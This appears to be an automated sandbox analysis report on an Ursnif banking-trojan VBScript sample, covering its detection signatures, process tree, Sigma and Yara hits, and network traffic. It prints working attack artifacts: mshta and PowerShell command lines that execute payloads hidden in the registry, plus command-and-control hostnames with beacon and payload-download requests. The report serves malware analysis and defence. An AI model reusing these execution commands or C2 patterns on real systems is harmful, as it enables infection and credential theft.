Play interactive tour

Edit tour

Analysis Report 0xyZ4rY0opA2.vbs

Overview

General Information

Sample Name:	0xyZ4rY0opA2.vbs
Analysis ID:	322273
MD5:	91c16c7f676eec811c3ad36e32a9dbb3
SHA1:	5395939a249782d0d6651d970f9a3af1df8924f6
SHA256:	67998bc22f994c7acb53cf98d8cf4d039a31b425f2b2f0c6d949426df05542c9
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Benign windows process drops PE files

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Dot net compiler compiles file from suspicious location

VBScript performs obfuscated calls to suspicious functions

Yara detected Ursnif

Allocates memory in foreign processes

Changes memory attributes in foreign processes to executable or writable

Compiles code for process injection (via .Net compiler)

Creates a thread in another existing process (thread injection)

Creates processes via WMI

Deletes itself after installation

Disables SPDY (HTTP compression, likely to perform web injects)

Found Tor onion address

Hooks registry keys query functions (used to hide registry keys)

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to steal Mail credentials (via file access)

Uses nslookup.exe to query domains

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Suspicious Rundll32 Activity

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

System is w10x64

wscript.exe (PID: 6296 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0xyZ4rY0opA2.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

iexplore.exe (PID: 6976 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 2936 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6976 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 5928 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)

iexplore.exe (PID: 5660 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 5768 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 2212 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:82952 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

mshta.exe (PID: 3096 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 5976 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 4560 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 6620 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD10C.tmp' 'c:\Users\user\AppData\Local\Temp\xuilsqrn\CSCD8A4030A3E546C3B2CF916F018EDC0.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

csc.exe (PID: 1620 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 6896 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE214.tmp' 'c:\Users\user\AppData\Local\Temp\iaweong2\CSC9F4D0947F3074F27AD7E2B0574F6C6A.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

RuntimeBroker.exe (PID: 3656 cmdline: MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

RuntimeBroker.exe (PID: 4268 cmdline: MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

cmd.exe (PID: 2936 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\8F31.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

RuntimeBroker.exe (PID: 4772 cmdline: MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

control.exe (PID: 7048 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)

rundll32.exe (PID: 204 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000002.00000003.882736166.0000000001040000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.719373287.0000000005668000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.719415680.0000000005668000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000018.00000003.882332819.000001B4AFFA0000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.817982563.00000000052EF000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.718993009.0000000005668000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.719443986.0000000005668000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000025.00000002.1294500412.000001DA4C27E000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000022.00000002.1296954401.0000027D4F83E000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.719331728.0000000005668000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000020.00000002.1311153355.0000000004DDE000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.719519037.0000000005668000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000002.923726669.0000000000C70000.00000040.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.719248205.0000000005668000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.762861604.00000000053ED000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.719501128.0000000005668000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.719850328.00000000054EB000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000023.00000002.1296813994.000001B4FAD4E000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: powershell.exe PID: 5976	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 14 entries

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5976, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline', ProcessId: 4560

Sigma detected: MSHTA Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3096, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 5976

Sigma detected: Suspicious Csc.exe Source File Folder

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5976, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline', ProcessId: 4560

Sigma detected: Suspicious Rundll32 Activity

Show sources

Source: Process started

Author: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 7048, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 204

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\earmark.avchd

Avira: detection malicious, Label: TR/Crypt.XDR.Gen

Multi AV Scanner detection for domain / URL

Show sources

Source: c56.lepini.at	Virustotal: Detection: 12%	Perma Link
Source: api3.lepini.at	Virustotal: Detection: 10%	Perma Link
Source: api10.laptok.at	Virustotal: Detection: 12%	Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\earmark.avchd	Metadefender: Detection: 29%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\earmark.avchd	ReversingLabs: Detection: 89%

Multi AV Scanner detection for submitted file

Show sources

Source: 0xyZ4rY0opA2.vbs

Virustotal: Detection: 22%

Perma Link

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\earmark.avchd

Joe Sandbox ML: detected

Source: C:\Windows\explorer.exe

Code function: 32_2_04DA37B8 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,

32_2_04DA37B8

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking:

Found Tor onion address

Show sources

Source: powershell.exe, 00000018.00000003.882332819.000001B4AFFA0000.00000004.00000001.sdmp

String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1

Uses nslookup.exe to query domains

Show sources

Source: unknown	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source: global traffic

HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at

Source: Joe Sandbox View

IP Address: 47.241.19.44 47.241.19.44

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Source: global traffic	HTTP traffic detected: GET /api1/wRVY2NGdrRF/A_2Fha_2BTMf9b/Bkb0axFyVYg6CTiYCB0u_/2BNYoZUqIeFy6mXY/RsCAvo5yVPYtDbs/KEFb4oNdgILibF2Swr/I2w7rEJuT/Pp84EV24JCnppdQDLtg7/0g_2BJz5R_2FkQu9e_2/FGSaB0rJRCWjGvLRGTnGVc/Iu0pUH4kxZUPO/79c_2Bxp/zIxSbOn31EVZ_2FT_2BE4Ox/zrp24711fz/qBCMvOouQ_2B_2FBw/tevTXGEDmXVA/Fo3RVdsoq0v/QtV4LsUKm4P4d7/Q_0A_0Dq_2BFdmy3Ge3KN/bxiA2odSfTOC3fY6/QHvvQODRC/J_2BkRbDk_2F/bf HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/1uvbKU_2Bbc/ULu41miz1odgDS/0s31zFbFtyChQRUZdq4O6/uZoXvkdGnqZk3S6m/sjGRAy2VVHXHIWC/GbATokLhfRKxJIkWlf/rpIWzL8Zz/AoLyYIkQLp5Egmn3wei2/_2BYsLzf0AqH_2FfXyU/ERE14WKmMp42qnHDG4GKCW/dW1JtsfpRq1bQ/nxcOGVyd/44_2FNnM0ZUEbkxaxhi6GSR/lIHQEHFzka/2x7wIaFlGrWFy74sl/6cFqI7aHF8g5/CnaY7J6ktLq/m_0A_0DTO0929p/475exW0EBf88dYERW4hkW/yci4B7l977luXmG4/ieH0MCQdwnavDmP/zBg2fJ8N/s HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/tQTtTlNNyyTHp8mZxwj/87ufrUlrtp1usWYjjxq_2B/yAOH12_2F1IYJ/lKW5AYnq/_2BbaPBw_2BvxMvagxVqPyJ/jSUh2wAda1/gHbr670JVUq1KwK7N/6uxLXG5CHSWb/dgl5wFu8VM1/Rkwn44dvXkxcGr/6ai4evYmGZZapTEFZPM6t/l7dnGylpkoukj_2B/UIph5LMwbusYJYR/SgNVcjHjuu6gNQMV1u/yo8w_2BDc/tr29yULxa_2FW8vjKL1w/IkKYcWnRbp20t9pYrs_/0A_0DOoPdbEyCpXUb3P_2B/SP7qNsXNt82Vl/EBYqhcdo/ksN77WU_2Bu9u_2Bp6ImMCY/qmYYk7_2FYRubl/N HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/k2_2BPSkEkmXT6PU/zDOxTRpC_2BY4wv/Uc9rQ_2BdQmALihj0b/O35yk81wO/_2BJJsGmcvqJn3WdvBLw/hcTBL2iarC4qZ4YV_2B/9d_2B7Ggs3BnAW23i_2Bde/t9JKt6KAZoSWe/re2dGR19/9ik0fbgVm0bNqFeU0yDPCsA/NCbWTLbFLW/YFtlZWtXaQQ7AvabV/oGahJymIxSEf/eCn4UPTT9W7/4TOvhUziJPirjd/aVzy6CqNvyNL3A4AuKPyc/d_2F7R5E_2FRLkVN/moL_2BcW_0A_0Dg/DfT_2BdqiAs0Ox1XHx/HnIUtWHt_/2F_2Bw1qPKdBjmoNms0Z/zZq7v HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Host: api3.lepini.at

Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)

Source: unknown

DNS traffic detected: queries for: api10.laptok.at

Source: unknown

HTTP traffic detected: POST /api1/ULQHRvwqRb/G8wDpH5qMRHl3_2B4/UEjMLLNvz2cZ/AqaL4_2BQcz/lKb4H9qP6o6VM4/FlSbx_2FrtqOlCmpoRQHO/gmwLzr_2B42eSyBR/YuYftTktOwyZz8p/hMg6srNEseymB6j4aM/TOURtgojN/ejIcLmrrpdo7g5MixpUk/u7YXv1vIle7x1I8w25J/iYIlQpBNQ_2F6_2F52tecp/haAs_2BPE0IZE/BFjaQwUV/3vmY6zByqYDob0bhn9M09Xl/4P5yimux7H/hMxuBTbr_0A_0DFL2/PNs4wicqd7PM/VagjrCBglgI/sb2CcVg_2F8b2O/GuU_2FGPPZ/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Content-Length: 2Host: api3.lepini.at

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Nov 2020 19:34:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000020.00000000.917550792.000000000FD8C000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/1uvbKU_2Bbc/ULu41miz1odgDS/0s31zFbFtyChQRUZdq4O6/uZoXvkdGnqZk3S6m/sjGRAy
Source: explorer.exe, 00000020.00000000.893860754.0000000001080000.00000002.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/tQTtTlNNyyTHp8mZxwj/87ufrUlrtp1usWYjjxq_2B/yAOH12_2F1IYJ/lKW5AYnq/_
Source: explorer.exe, 00000020.00000000.917550792.000000000FD8C000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/tQTtTlNNyyTHp8mZxwj/87ufrUlrtp1usWYjjxq_2B/yAOH12_2F1IYJ/lKW5AYnq/_2BbaP
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
